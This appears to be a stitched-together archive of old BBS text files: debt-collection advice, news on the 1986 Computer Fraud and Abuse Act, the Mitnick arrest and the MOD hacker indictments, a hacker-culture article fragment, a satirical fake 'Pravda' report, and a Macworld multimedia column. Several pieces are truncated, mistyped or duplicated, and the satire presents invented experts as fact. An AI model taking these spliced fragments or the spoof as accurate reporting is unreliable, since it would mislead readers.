|                                  |    |  agency.   Meanwhile,  let  both  |
|  IMMEDIATELY CONTEST IN WRITING  |    |  creditor and collection  agency  |
|  ANY  INACCURATE  CHARGES,  AND  |    |  know that  you've  alerted  the  |
|  REQUEST VERIFICATION.           |    |  FTC.  Their attitudes  may  not  |
|  No collection  activities  may  |    |  improve,   but  their  behavior  |
|  proceed   until  a  charge  is  |    |  probably will.                   |
|  verified:   Waiting may make a  |    |                                   |
|  challenge more difficult.       |    |  STATE    CONSUMER    PROTECTION  |
|                                  |    |  AGENCY.   In some states,  this  |
|  IF YOU REALIZE  THAT  YOU  ARE  |    |  government office can arbitrate  |
|  NOT GOING TO BE ABLE  TO  MAKE  |    |  a  dispute   and   order   that  |
|  REQUIRED PAYMENTS ON  A  DEBT,  |    |  abusive practices  be  stopped.  |
|  CONTACT THE CREDITOR.     Most  |    |  If your debt is  undisputed  or  |
|  are  understanding   and   co-  |    |  can be proved,  the agency  can  |
|  operative if  you  propose  an  |    |  help you negotiate a reasonable  |
|  alternate payment plan at  the  |    |  extended-payment plan;  it  may  |
|  first sign of trouble.  Review  |    |  also  have  greater   power  to  |
|  your own budget,  determine  a  |    |  intervene in an individual case  |
|  monthly amount you can  afford  |    |  than  a  regional  FTC   office  |
|  to  pay,   then  explain   the  |    |  would.                           |
|  problem to  the  creditor  and  |    |    To learn what state  services  |
|  offer  to   pay   the   lesser  |    |  are available  to  protect  you  |
|  amount.                         |    |  against collection  harassment,  |
|                                  |    |  contact your  state  government  |
|  DON'T ALLOW YOUR ACCOUNT TO BE  |    |  information-office   or    your  |
|  TRANSFERRED  TO  A  COLLECTION  |    |  state    attorney     general's  |
|  AGENCY    THROUGH   YOUR   OWN  |    |  office.                          |
|  INACTION.     Creditors    use  |    |                                   |
|  collection  agencies  to  goad  |    |    If the improper conduct comes  |
|  the  reluctant  or  forgetful.  |    |  from an attorney practicing law  |
|  A  creditor  who   understands  |    |  in the collection area, contact  |
|  that you are overextended  but  |    |  your LOCAL BAR ASSOCIATION, and  |
|  doing the best  you  can  will  |    |  ask for the disciplinary  board  |
|  have no reason  to  resort  to  |    |  or   licensing   agency    that  |
|  such measures.                  |    |  receives   complaints   against  |
|    Many people are too  anxious  |    |  lawyers.   They probably  won't  |
|  or embarassed  to  approach  a  |    |  step in  directly;  however,  a  |
|  creditor  about  dificulty  in  |    |  lawyer    who   knows   that  a  |
|  making payments. Remember that  |    |  complaint   is  being   checked  |
|  the creditor, whether a merch-  |    |  generally takes  more  care  to  |
|  ant or a banker, wants to keep  |    |  act within  legal  and  ethical  |
|  your  business.   An  amicable  |    |  bounds.                          |
|  resolution is in  "everyone's"  |    |                                   |
|  interest.                       |    |  CONSUMER   CREDIT    COUNCELING  |
|                                  |    |  AGENCIES.     Frequently    the  |
+----------------------------------+    |  problem is less one of outright  |
                                        |  harassment than of anxiety  and  |
                                        |  increasingly short  tempers  on  |
                                        |  both sides.   A nonprofit  con-  |
                                        |  sumer credit counceling  agency  |
                                        |  has  no  official   enforcement  |
                                        |  power, but it  "can"  help  you  |
                                        |  assess your financial situation  |
                                        |  and act as a mediator in making  |
                                        |  more mutually suitable  payment  |
                                        |  arrangements.                    |
                                        |                                   |
                                        +-----------------------------------+






Downloaded From P-80 Systems.....
                                                      

------------------------------------------------------------
                  Computer Hackers Beware!
------------------------------------------------------------
         Senate Passes Computer Fraud And Abuse Act
------------------------------------------------------------



    The Senate October 2 unanimously passed the Computer
Fraud and Abuse Act of 1986.  The bill, s. 2281, imposes
fines of up to $500,000 and/or prison terms of up to 20
years for breaking into government or financial
institutions' computers.

    The Federal Government alone operates more than 18,000
medium-scale and large-scale computers at some 4,500
different sites. the Office of Technology Assessment
estimates the government's investment in computers over the
past four years at roughly $60 million. The General Services
Administration estimates that there will be 250,000 to
500,000 computers in use by the Federal Government by 1990.

    In 1984, Legislators' attention to and concern about
computer fraud was heightened by a report by the American
Bar Association task force on computer crime. According to
the report, based on a survey of 1,000 private organizations
and public agencies, percent of the 283 respondents had been
victimized by some form of computer crime, and more than 25
percent had sustained financial losses totaling between an
estimated $145 million and $730 million during one twelve-
month period.

    To address this problem, the Senate and House enacted,
in 1984, the first computer statute (18 u.s.c. 1030). Early
this year both the House and Senate introduced legislation
to expand and amend this statute.

    In the current bill, which is expected to be signed by
President Reagan next week, penalties will be imposed on
anyone who knowingly or intentionally accesses a computer
without authorization, or exceeds authorized access and:

    (1) Obtains from government computers information
        relating to national defense and foreign relations.

    (2) Obtains information contained in financial records
        of financial institutions.

    (3) Affects the use of the government's operation of a
        computer in any department or agency of the
        government that is exclusively for the use of the
        U.S. Government.

    (4) Obtains anything of value, unless the object of the
        fraud and the thing obtained consists only of the
        use of the computer.

    (5) Alters, Damages, or Destroys Information in any
        federal interest computer, or prevents authorized
        use of any such computer or information.

    Under the bill, a person would be guilty of computer
fraud if he or she causes a loss of $1,000 or more during
any one year period.

    Depending on the offense, penalties include fines up to
$100,000 for a misdemeanor, $250,000 for a felony, $500,000
if the crime is committed by an organization, and prison
terms of up to 20 years.

    The bill also prohibits traffic in passwords and other
information from computers used for interstate or foreign
commerce. This part of the bill makes it possible for
Federal Prosecutors to crack down on Pirate Bulletin Boards
and similar operations because the bill covers business
computers, online networks, and online news and information
services, all of which are considered interstate commerce.


 Slippery cybervandal caught in his own electronic web
-----------------------------------------------------

(c) Copyright the News & Observer Publishing Co.
How a computer sleuth traced a digital trail

New York Times

RALEIGH, N.C. (9:05 p.m.) -- After a search of more than two years, a team
of FBI agents early Wednesday morning captured a 31-year-old computer
expert accused of a long crime spree that includes the theft of thousands
of data files and at least 20,000 credit card numbers from computer
systems around the nation.

The arrest of Kevin D. Mitnick, one of the most wanted computer criminals,
followed a 24-hour stakeout of a Raleigh apartment building here.

A convicted computer felon on the run from federal law enforcement
officials since November 1992, Mitnick has used his sophisticated skills
over the years to worm his way into many of the nation's telephone and
cellular telephone networks and vandalize government, corporate and
university computer systems. Most recently, he had become a suspect in a
rash of break-ins on the global Internet computer network.

"He was clearly the most wanted computer hacker in the world," said Kent
Walker, an assistant U.S. attorney in San Francisco who helped coordinate
the investigation. "He allegedly had access to corporate trade secrets
worth billions of dollars. He was a very big threat."

But federal officials say Mitnick's confidence in his hacking skills may
have been his undoing. On Christmas Day, he broke into the home computer
of a computer security expert, Tsutomu Shimomura, a researcher at the
federally financed San Diego Supercomputer Center.

Shimomura then made a crusade of tracking down the intruder, an obsession
that led to Wednesday's arrest.

It was Shimomura, working from a monitoring post in San Jose, Calif., who
determined last Saturday that Mitnick was operating through a computer
modem connected to a cellular telephone somewhere near Raleigh, N.C.

Sunday morning, Shimomura flew to Raleigh, where he helped telephone
company technicians and federal investigators use cellular-frequency
scanners to home in on Mitnick.

Mitnick was arrested at 2 o'clock Wednesday morning in his apartment in
the Duraleigh Hills neighborhood of northwest Raleigh, after FBI agents used
their scanners to determine that Mitnick, in keeping with his nocturnal
habits, had connected once again to the Internet.

Shimomura was present Wednesday at Mitnick's pre-arraignment hearing at
the
federal courthouse in Raleigh. At the end of the hearing, Mitnick, who now
has shoulder-length brown hair and was wearing a black sweat suit and
handcuffs, turned to Shimomura, whom he had never met face to face.

"Hello, Tsutomu," Mitnick said. "I respect your skills."

Shimomura, who is 30 and also has shoulder-length hair, nodded solemnly.


Mitnick, already wanted in California for a federal parole violation, was
charged Wednesday with two federal crimes. The first, illegal use of a
telephone access device, is punishable by up to 15 years in prison and a
$250,000 fine.

The second charge, computer fraud, carries potential penalties of 20 years
in prison and a $250,000 fine. Federal prosecutors said they were
considering additional charges related to Mitnick's reported Internet
spree.

Federal officials say Mitnick's motives have always been murky. He was
recently found to have stashed thousands of credit card numbers on
computers in the San Francisco Bay area -- including the card numbers of
some of the best-known millionaires in Silicon Valley. But there is no
evidence yet that Mitnick had attempted to use those credit card accounts.

Indeed, frequently ignoring the possibility of straightforward financial
gain from the information he has stolen, Mitnick has often seemed more
concerned with proving that his technical skills are better than those
whose job it is to protect the computer networks he has attacked.

Federal officials say the arrest of Mitnick does not necessarily solve all
the recent Internet crimes, because his trail of electronic mail has
indicated that he may have accomplices. One of them is an unknown computer
operator, thought to be in Israel, with whom Mitnick has corresponded
electronically and boasted of his Internet exploits, investigators said.

Still, the capture of Mitnick gives the FBI custody of a notoriously
persistent and elusive computer break-in expert. Raised in the San
Fernando Valley near Los Angeles by his mother, Mitnick has been in and out of
trouble with the law since 1981.

It was then, as a 17-year-old, that he was placed on probation for
stealing computer manuals from a Pacific Bell telephone switching center in Los
Angeles.
     '          0*0*0*      Those who know Mitnick paint a picture of a man obsessed with the power
inherent in controlling the nation's computer and telephone networks.

The recent break-ins he is accused of conducting include forays into
computer systems at Apple Computer Inc. and Motorola Inc. and attacks on
commercial services that provide computer users with access to the
Internet, including the Well in Sausalito, Calif., Netcom in San Jose,
Calif., and the Colorado Supernet, in Boulder, Colo.

To make it difficult for investigators to determine where the attacks were
coming from, Mitnick is said to have used his computer and modem to
manipulate a local telephone company switch in Raleigh to disguise his
whereabouts.

In recent weeks, as an elite team of computer security experts tightened
an invisible electronic net around the fugitive, Mitnick continued to taunt
his pursuers, apparently unaware of how close they were to capturing him.

About 10 days ago, for example, someone whom investigators believe to have
been Mitnick left a voice-mail message for Shimomura, a Japanese citizen.
The message reprimanded Shimomura for converting the intruder's earlier
voice-mail messages into computer audio files and making them available on
the Internet.

"Ah Tsutomu, my learned disciple," the taunting voice said. "I see that
you put my voice on the Net. I'm very disappointed, my son."

But the continued attempts at one-upmanship simply gave the pursuers more
electronic evidence.

"He was a challenge for law enforcement, but in the end he was caught by
his own obsession," said Kathleen Cunningham, a deputy marshal for the
U.S.  Marshals Service who has pursued Mitnick for several years.

Mitnick first came to national attention in 1982 when, as a teen-age
prank, he used a computer and a modem to break into a North American Air Defense
Command computer.

He subsequently gained temporary control of three central offices of
telephone companies in New York City and all the phone switching centers
in California.

This gave him the ability to listen in on calls and pull pranks like
reprogramming the home phone of someone he did not like so that each time
the phone was picked up, a recording asked for a deposit of a coin.

But the break-ins escalated beyond sophomoric pranks. For months in 1988,
Mitnick secretly read the electronic mail of computer security officials
at MCI Communications and Digital Equipment Corp., learning how their
computers and phone equipment were protected.
Officials at Digital later accused him of causing $4 million in damage to
computer operations at the company and stealing $1 million of software. He
was convicted in July 1989 and sentenced to a year in a low-security
federal prison in Lompoc, Calif.

One of his lawyers convinced the court that Mitnick had an addiction to
computers. In July 1989, after his release from prison, he was placed in a
treatment program for compulsive disorders, the Beit T'Shuvah center in
Los Angeles. During his six months there, he was prohibited from touching a
computer or modem.

That restriction was a condition of his probation when he was released in
mid-1990, and it was for reportedly violating this condition that federal
officials were pursuing him when he dropped out of sight in November 1992.

In September 1993, the California Department of Motor Vehicles also issued
a warrant for his arrest. The warrant stated that Mitnick had wiretapped
calls from FBI agents. He then used law-enforcement access codes obtained
by eavesdropping on the agents to illegally gain access the drivers'
license data base in California.

Federal law enforcement officials believe that Mitnick has conducted a
long string of computer and phone telephone network break-ins during more than
two years on the run.

And they say his ability to remain at large until now illustrates the new
challenges that law enforcement officials face in apprehending criminals
who can cloak themselves behind a curtain of forged electronic data.




 <-> Hackers in the MOB <->


*****************************************************************
     According  to Schmidt,  the dollar amounts are only part  of 
the story,  GTE Telemail,  an electronic mail system,  was broken 
into  by  at least four gangs of hackers,  he says.   "They  were 
raising hell.  The system got shut down one time for a day.  None 
of these people have been charged,  nor have any of the 414s been 
charged yet.

     "We have a major problem with hackers, phreaks and thieves," 
says  Schmidt,  who  estimates that 75% of criminal  hackers  are 
teenagers  and  the other 25% are adults using  teenagers  to  do 
their dirty work for them.

     "Adults are masterminding some of this activity.   There are 
industrial  spies,  people  playing  the stock  market  with  the 
information- just  about  any  theft or fraud you can do  with  a 
computer.   There  are no foreign agents or organized crime  yet, 
but it's inevitable," he says.   "I believe there are some people 
out there now with possible organized-crime connections.

     "It's an epidemic.   In practically every upper-middle class 
high school this is going on.   I know of a high-school  computer 
class  in a school in the north Dallas suburbs where the kids are 
trying  everything  they  can  think  of  to  get  into  the  CIA 
computers."

     "It's  a  strange culture," says SRI's Parker,  "a  rite  of 
passage  among technology-oriented youth.   The inner  circle  of 
hackers say they do it primarily for educational purposes and for 
curiosity.   They  want to find out what all those computers  are 
being used for.   There's a meritocracy in the culture,  each one 
trying to out do the other.   The one who provides the most phone 
numbers and passwords to computer systems rises to the top of the 
hackers.

      "For  the most part it's malicious mischief,"  Parker says.  
"They rationalize that they're not really breaking any laws, just 
'visiting' computers.   But that's hard to believe when they also 
say  they've got to do their hacking before they turn 18 so  they 
don't come under adult jurisdiction.   After 18,  they have to do 
it vicariously through surrogates.   They are some grand old  men 
of  hacking who egg on the younger ones...  There have been  some 
cases  of  a  Fagin complex- a gang of kids led by  one  or  more 
adults- in Los Angeles."

      Who are the hackers and what secret knowledge do they have?

     A 17-year-old youth in Beverly Hills,  California, announced 
himself  to  other  hackers  on a bulletin  board  in  this  way: 
"Interests  include  exotic  weapons,   chemicals,  nerve  gases, 
proprietary information from Pacific Telephone..."

     Prized secret knowledge includes the two area codes in North 
America  that have not yet installed electronic switching  system 
central-office  equipment.   Using this information you can  call 
those  areas  and  use  a blue box to  blow  the  central  office 
equipment,  and  then call anywhere in the world without  charge.  
Other  secret information lets you avoid being traced when you do 
this.

     A  knowledge of the phone systems lets hackers share one  of 
the  technological  privileges usually available  only  to  large 
corporate customers: long-distance conference calls connecting up 
to  59  hackers.   Schmidt  estimates  there are  three  or  four 
conference calls made every night.   The hackers swap more inside 
information during the phone calls.

     Thanks  to packet-switching networks and the fact that  they 
don't have to pay long-distance charfus,  time and distance  mean 
almost nothing to hackers.  Desktop microcompters hook into phone 
lines  via  modems  make it easy to obtain  copyrighted  software 
without human intervention.

     "Software piracy exists only because they can do it over the 
phone long distance without paying for it," Schmidt says.   "some 
stuff  gets sent through the mail,  but very little.   There  are 
bulletin  boards  that exist solely for the purpose  of  pirating 
software.   A program called ASCII Express Professional (AE  Pro) 
for  the  Apple  was  designed  specifically  for  modem-to-modem 
transfers.  You can make a copy of anything on that computer.  It 
can be copyrighted stuff- WordStar, anything.  There are probably 
about  three  dozen  boards  like  that.   Some  boards  exchange 
information on breaking onto mainframes.

     "In 1982 the FBI really didn't know what to do with all this 
information,"  Schmidt says.   "There isn't a national  computer-
crime  statue.   And  unless there's  $20,000  involved,  federal 
prosecutors won't touch it."

     Since then, the public and federal prosecutors' interest has 
picked  up.   The  film War Games and the arrest of 414 group  in 
Milwaukee  "created a lot of interest on Congress and with  other 
people," FBI instructor Lewis says. "But, for ourselves it didn't 
really have any impact."

     "We'd been providing the training already," says Jim  Barko, 
FBI  unit  chief  of  the EFCTU (economic  and  financial  crimes 
training  unit).   He says public interest may make it easier  to 
fight computer crime.   "There are more people interested in this 
particular  area  now as a problem.   War  Games  identified  the 
problem.   But  I think it was just circumstantial that the movie 
came out when it did."

     Despite  the help of knowledgeable informants like  Schmidt, 
tracking  down hackers can be frustrating business for  the  FBI.  
SRI's  Parker  explains  some  of the  pitfalls  of  going  after 
hackers:  "Some  FBI  agents  are very  discouraged  about  doing 
something  about  the hacking thing.   The cost of  investigation 
relative  to the seriousness of each case is just too  high,"  he 
says.   "Also, federal regulations from the Department of Justice 
make it almost impossible for the FBI to deal with a juvenile."

     An FBI agent cannot question a  juvenile without his parents 
or a  guardian being present.   The FBI  approach has been mostly 
to  support  lhe local police because local police are  the  only 
ones who can deal with juveniles.   Another difficulty the agency 
faces is the regulations about its jurisdiction.

     "There  has  to  be  an attack on  a  government  agency,  a 
government contractor or a government-insured institution for the 
FBI to have clear-cut jurisdiction," Parker says.

     The FBI gets called into a case only after a crime has  been 
detected by the complaining party.   The FBI has done a generally 
competent  job of investigating those crimes it was called in  to 
investigate,  in Parker's view.   But the federal agency's job is 
not  to  help  government or financial  institutions  attempt  to 
prevent  crimes,  nor is its function to detect the crimes in the 
first place.

     "We're  not  out detecting any type of crime,"  says  Lewis.  
"We   like  to  think  we  can  prevent  them.    We   can   make 
recommendations.  But  do  we detect bank robberies or  are  they 
reported  to  us?    Or  kidnapping- do  we  detect  those?    Or 
skyjacking?   There must be some evidence of crime,  a crime over 
which  the  FBI  has jurisdiction.   Then we open a  case."   And 
despite the spate of arrests and crackdowns last summer, it looks 
like the FBI will have its hands full in the future:  The hackers 
have  not  gone  away.   Like mice running  through  the  utility 
passages  of  a large office building,  they  create  damage  and 
inconvenience,  but  are  tolerated  as long  as  their  nuisance 
remains bearable.

     That status could change at any time, however.

     Meanwhile,  little  electronic "sting" operations similar to 
Abscam keep the element of danger on the hacker's game.   An  Air 
Force  telephone  network  called AUTOVON  (a  private  telephone 
system  connecting  computers on every Air Force installation  in 
the  world),  was reportedly cracked by a hacker last last  year.  
The  hacker  published  lists of AUTOVON dialups  on  a  bulletin 
board.

     The  breach  came  to the attention `oo  the  Department  of 
Defense on late 1983, but apparently nothing was done to stop the 
hackers.   Then, in January, the AUTOVON number was answered in a 
sultry  female voice.   We wish to thank one and all for allowing 
us  to make a record of all calls for the past few  months.   You 
will be hearing from us real soon.  Have a happy New Year."

     That's a New Year's message calculated to give any hacker  a 
chill.

-End of file-

.



DOWNLOADED FROM P-80 SYSTEMS.......
                                                                                                                     * Originally By: Randy Edwards
 * Originally To: All
 * Originally Re: NEW YORK COMPUTER CRIME INDICTMENTS
 * Original Area: <FIDO> U.S. News & World Report
 * Forwarded by : Blue Wave v2.10

 Via The NY Transfer News Service 718-448-2358, 718-448-2683
 Subject: New York Computer Crime Indictments
  Date: 10 Jul 92 21:14:29 EDT
  From: mcmullen@well.sf.ca.us
  alt.society.cu-digest Sun Jul 12 18:18:52 1992

  NEW YORK, N.Y., U.S.A., 1992 JULY 9 (NB) -- Otto G. Obermaier, United
States Attorney for the Southern District of New York, has announced the
indictment of five "computer hackers" on charges of computer tampering,
computer fraud, wire fraud, illegal wire tapping and conspiracy. The
announcement was made at a press conference at 2:00 PM on Wednesday, July
8th at the Federal Court hose in Manhattan

  Named in the indictment were Julio Fernandez, 18, known as the "Outlaw";
John Lee, 21, a/k/a "Corrupt"; Mark Abene, 20, a/k/a "Phiber Optik"; Elias
Ladopoulos, 22, a/k/a "Acid Phreak"; and "Paul Stira, 22, a/k/a "Scorpion."
In addition to alleged specific illegal acts involving computers, the five
individuals were also charged with conspiracy.

  According to the indictment, the five were members of a group known as MOD
(standing for either "Masters of Disaster" or "Masters of Deception") and
the goal of the conspiracy was "that the members of MOD would gain access to
and control of computer systems in order to enhance their image and prestige
among other computer hackers; to harass and intimidate rival hackers and
people they did not like; to obtain telephone, credit, information, and
other services without paying for them; and to obtain. passwords, account
numbers and other things of value which they could sell to others."

  The indictment defines computer hacker as "someone who uses a computer or
a telephone to obtain unauthorized access to other computers."

  Obermaier stated that this investigation was "the first investigative use
of court-authorized wiretaps to obtain conversations and data transmissions
of computer hackers." He said that this procedure was essential to the
investigation and that "It demonstrates, I think, the federal government's
ability to deal with criminal conduct as it moves into new technological
areas." He added that the interception of data was possible only because the
material was in analog form and added "Most of the new technology is in
digital form and there is a pending statute in the Congress which seeks the
support of telecommunications companies to allow the federal government,
under court authorization, to intercept digital transmission. Many of you
may have read the newspaper about the laser transmission which go through
fiber optics as ernment needs the help of Congress and, indeed, the
telecommunications companies to able to intercept digital While all of those
indicted were charged with some type of unlawful access to one or more of
computer systems belonging to the following: Southwestern Bell, BT North
America, New York Telephone, ITT, Information America, TRW, Trans Union,
Pacific Bell, the University of Washington, New York University, U.S. West,
Learning Link, Tymnet and Martin Marietta Electronics Information and
Missile Group, Fernandez and Lee were also charged with selling illegally
obtained credit information to a person that later re-sold the information
to private detectives.

  Assistant United States Attorney Stephen Fishbein announced that Morton
Rosenfeld has been indicted and pled guilty to purchasing credit information
and access codes from persons named "Julio" and "John." Fishbein said that
Rosenfeld, at the time of his arrest on December 6, 1991, has approximately
176 TRW credit reports in his possession. Rosenfeld, 21, pled guilty on June
24, 1992 and is scheduled to be sentenced on September 9th. He faces a
maximum of five years imprisonment and a fine of the greater of $250,000 or
twice the gross gain or loss incurred.

  Fishbein also announced the outcome of a "separate but related court
action, Alfredo De La Fe, 18, pled guilty on June 19, 1992 to the use and
sale of telephone numbers and codes for Private Branch Exchanges (PBX's). De
La Fe said that he had sold PBX numbers belonging to Bugle Boy Industries to
a co-conspirator who used the numbers in a call-selling operation. He also
said that he and a person that he knew as "Corrupt" had made illegal long
difference conference calls. De La Fe faces the same maximum penalty as
Rosenfeld and is scheduled for sentencing on August 31st.

  Among the charges against the five charged as conspirators is the
allegation that Fernandez, Lee, Abene and "others whom they aided and
abetted" performed various computer activities "that caused losses to
Southwestern Bell of approximately $370,000. When asked by Newsbytes how the
losses were calculated, Fishbein said that there was no breakdown beyond
that stated in the indictment -- "expenses to locate and replace computer
programs and other information that had been modified or otherwise
corrupted, expenses to determine the source of the unauthorized intrusions,
and expenses for new computers and security devices that were necessary to
prevent continued unauthorized access by the defendants and others whom they
aided and abetted."

  In answer to a Newsbytes question concerning the appropriateness of making
an intruder into a computer system totally responsible for the cost of
adding security features "which possibly should have been there to begin
with," Obermaier said "That theory would make the burglar the safety expert
since one can't have people going around fooling around with other people's
relatively private information and then claiming that I'm doing it for their
good."

  Paul Tough of Harper's Magazine followed up on the same topic by saying
"In the Craig Neidorf case a regional telephone company claimed that a
document was worth over $100,000. When it was found to be worth only $12,
the case was thrown out. In view of that, are you concerned that they
(Southwestern Bell) may have overreported? In response, Obermaier "No, we
are not concerned. It's a matter of proof and, if the accused stand trial
and have a similar experience to as happened the case you cite, not in this
district, then the results predictably will be the same." Fishbein said that
the conspiracy change carries a maximum sentence of five years imprisonment
while each of the other counts (there are 10 additional counts) carries a
maximum of five years imprisonment and a fine of the greater of $250,000 or
twice the gross gain or loss incurred. A single exception is a count
charging Fernandez with possessing fifteen or more unauthorized access
devices. That count carries a maximum penalty of ten years imprisonment.

  In response to a statement by Alex Michelini of the New York Daily News
that "What you've outlined, basically, except for the sales of credit
information, this sounds like a big prank, most of it," Obermaier said
"Really, Well, I suppose, if you can characterize that as a prank but it's
really a federal crime allowing people without authorization to rummage
through the data of other people to which they do not have access and, as I
point out to you again, the burglar cannot be your safety expert. He may be
inside and laugh at you when you come home and say that your lock is not
particularly good but I think you, if you were affected by that contact,
would be somewhat miffed"

  Obermaier also said that "The message that ought to be delivered with this
indictment is that such conduct will not be tolerated, irrespective of
tensible purpose."

   Obermaier also said that "The message that ought to be delivered with
this indictment is that such conduct will not be tolerated, irrespective of
the ag of the particular accused or their ostensible purpose."

  Others participating in the news conference were Raymond Shaddick, United
States Secret Service assistant director - Office of Investigations; William
Y. Doran, FBI special agent in charge, New York criminal division; Scott
Charney, United States Dept. of Justice chief of computer crime unit. All
stressed the cooperation that had gone on between the various law
enforcement agencies during the investigation.

  Charney told Newsbytes that, in spite of the fact that the search warrants
executed on Stira and Ladopoulos preceded those executed on Lee and
Fernandez by almost two years and that the last specific allegation against
Stira proceeds the first against Lee by 16 months and the first against
Fernandez by 21 months, there is evidence that links them together in the
conspiracy. Charney also told Newsbytes that the counts against Abene were
not related to a misdemeanor conviction in early 1991 for which he served
community service. Those indicted have been asked to present themselves at
New York Service Services headquarters at 9:00 AM on July 8th for
fingerprinting. Arraignment for the indicted is scheduled for Thursday, July
16th.

  Abene told Newsbytes that while he couldn't comment on anything related to
the indictment until he obtained legal counsel, "I've been participating i
conferences with law enforcement personnel and guest lecturing to college
classes for the last year and a half. In every case, I have said how those
responsible for information about us have the responsibility to protect that
data. I have also tried to explain the great difference between a true
hacker and a person who uses computers for criminal profit. I hope that I
have increased understanding with these efforts."

  (Barbara E. McMullen & John F. McMullen/Press Contacts:Federico E.
Virella, Jr., United States Attorney's Office, 212 791-1955; Betty Conkling,
United States Secret Service, 212 466-4400; Joseph Valiquette, Jr, Federal
Bureau of Investigation, 212 335-2715/19920709)

-!- GoldED 2.40
 ! Origin: Marxists do it with CLASS. (1:128/105)

 
--- Blue Wave/TG v2.10 [NR]
 * Origin: SYSTEM: Utility City BBS (313-299-5854) (85:871/112.0)
SPLIT PERSONALITIES ON ELECTRONIC BULLETIN BOARDS

by Rangott Spliekin

     During my brief visit to the United States in the fall
of 1987, I was able to study certain specialized cases of
split personalities. While they are considered harmless and
perhaps tolerably eccentric by the American psychiatric
establishment, it is acknowledged that it is a growing
problem among young technicians.

     Frustrated by a lack of popular recognition which
continues to be focused on earners of large income (The
"bottom line" as it is popularly called), these young
geniuses are beginning to talk to themselves. But unlike
the ramblers and murmurers we find here in Moscow, they
use the technology available to individuals in America:
the home computer.

     A network of electronic bulletin boards exists in
the U.S., connected by commercial telephone lines and
available to almost anyone who has a computer and a telephone
connection device known as a "modem."  Individual subscribers
can then sign in and talk to other, similarly uninspired
individuals. The system was developed for the quick transfer
of information but has degenerated into a remote, arms-length
communications system.

     In fact, anyone who can afford to have their home
computers occupied most of the time can establish such a
board with "free" software provided by generous programmers.
When I suggested to an official of a conglomerate telephone
company that it was they who created the software to keep
technicians occupied instead of productive and to increase
the profits of the telephone company, the charge was denied.

     But I digress.

     I interviewed Dr. George Sands of the Institute for
Abnormal Electronic Behavior in Berkeley and he acknowledged
that there is a growing problem among young technicians
(which he insisted on calling "users") as the amount of
bulletin boards continue to grow.

     "There are actually more bulletin boards than users
in the Bay Area [San Francisco and environs] and they kept
talking and arguing with the same people. Some were clearly
showing symptoms of boredom. A few clever ones signed on
these boards under several names, taking on a new persona
for each name. They would call under one name and answer
under another name.

     "In one case, a man in his mid-fifties had as many as
six personas and possibly as many as eight. One of the
personas was actually promoted to assistant system operator."
     "How could that be?" I asked.

     "The operator had never actually met this man. Nor heard
his voice. In fact," he chuckled, "one of those personas was
a woman. Now that couldn't happen if he had ever spoken to
him on a voice line."

     Dr. Sands dismissed my contention that the bulletin
board system was dehumanizing, explaining that that was what
was said about telephones when they were first developed.
"Americans have too little history to take it seriously. They
much prefer playing with their tools which they often mistake
for toys. Ships were redesigned, in the Nineteenth Century,
for quick, commercial, and sometimes revenue-evading, trips
to all parts of the world. Soon afterwards, Americans were
racing them for sport. The home computer is just another
misused tool."

     The real danger, he went on to say, is that more
individuals will become isolated from their fellow men. "Home
computers are much more entertaining than even T.V. and
television has created a whole generation of stay-at-homers,
referred sarcastically by some commentators as 'couch
potatoes.'"  If anything has staved off this horrible
eventuality, he went on to say, it is the fact that more
training is required to operate a home computer than a
television set.

     At the moment, only "the best and the brightest and the
most eccentric" are falling prey to this problem."

     I asked the good doctor how such people can be spotted
and institutionalized for their own good.

     He gave the following indications.

1. Their homes lack most furniture, having only the bare
   essentials.

2. Everything is spotlessly clean except for the television
   set which will have a layer of dust on the screen.

3. The bed is never made.

4. There will be six or seven phone lines to the home.

5. Only computer manuals will be present, no other books.

6. The men will be almost universally divorced (no women
   have fallen prey to this yet despite the fact that some
   of the pathological personas are women) or be on the
   verge of divorce.

7. Their children, if any, will have run away from home. No
   very young victim has had any children.

8. Sexually, they will be inactive. At least, they won't
   reproduce.

9. As with alcoholics, they will be scrupulously careful to
   report to their jobs each day but they will be uncreative
   and rarely be promoted to positions of responsibilities.
   Not because of lack of abilities, but because they will
   evade the extra time necessary to accomplish these goals.

10. The refrigerator will contain only spoiled potato chips
    and half-opened cans of beers. Many of these users drink
    soft-drinks because of the high sugar content. One
    institutionalized case had not eaten in six days. He was
    found by the police in a small grocery store, after
    closing hours, with open bags of chips and six-packs of
    Cokes lying about, laughing hysterically and trying to
    dial out on the computerized cash register. When they saw
    the thick glasses and the plastic pen holder in his
    pocket, they notified Dr. Sands.

     The United States government has tried unsuccessfully to
introduce electronic bulletin boards in the Moscow area so
our geniuses are similarly engaged in fruitless labor.

     The great Pavlov once pointed out that to hypnotize
a chicken, you merely need to draw a chalk line along
pavement, place the chicken so its legs are on either side
of the line and it will freeze. Human beings require a
more complex hypnotic tool and television has served the
state well over the years.

     Now, such a hypnotic tool has been found for the
intelligentsia. It's even got them talking to themselves.

                             ---

Translated from PRAVDA
Translation (c) 1987 by Yves BarberoMultimedia - worse than Tomorrow's Schools?

This is a column from an issue of Macworld, about the dangers of the
upcoming multimedia 'revolution'. I think it's important to be aware of
just what may lie behind the hype and marketing. Think.

With thanks to Mark Norman, who typed it all in....
------------------------------------------------------------------------------
THE END OF LITERATURE
Multimedia is Television's insidious offspring.

By Steven Levy
(C) 1990 Macworld Communications Inc.

    Multimedia has become a certified buzzword in computerdom, so much 
so that the only people who's heads don't drop to the table when that word is 
intoned are those who have something to sell. At the heart of the instant 
boredom concerning this presumably exciting concept is overhype. The 
promise of multimedia is just a little too far ahead of what Macintoshes 
(and other PC's, including those of IBM, a company also touting multimedia 
as the platform of the future) can presently deliver. And besides, in the 
mantra-like repetition of the word, its definition has fuzzed to the point of 
near-meaningless. What is multimedia, anyway? Should we care?
    We should care very much. Because despite its vague beginnings, 
multimedia is just as potent as its myriad promoters say it is. The forces of 
history almost dictate that it will succeed, and in the not-distant future, 
multimedia will be so easy to produce that it will be pandemic as a means 
of communication.
    But no one, at least to my knowledge, has anticipated the potentially 
disastrous effects of multimedia's success. So please say you read it here 
first: multimedia will hasten the end of literacy. Despite the fact that its 
promoters are almost universally well intentioned, multimedia's lasting 
legacy will be the debasement of the remaining forms of communication in 
this country that have not already been debased by the perpetually widening 
gyre of television.

Tale of the Tube
    First of all, let's consider the nature of multimedia. Once you strip it 
bare of its considerable pretensions, multimedia is essentially one thing: 
computer applications that aspire to being television. Once you add video-
quality images, high resolution animation, and high-fidelity sound to 
computer files, you've got your MTV. That's why some folks are calling this 
Desktop MTV. (Wimps call it Desktop Media - same difference.) Presumably, 
these multimedia capabilities aid the user in communicating and learning.
    But this is a different form of communication we're talking about, 
something that, according to Business Week magazine, "could change the 
way people work, learn and play." How is multimedia different? With colours 
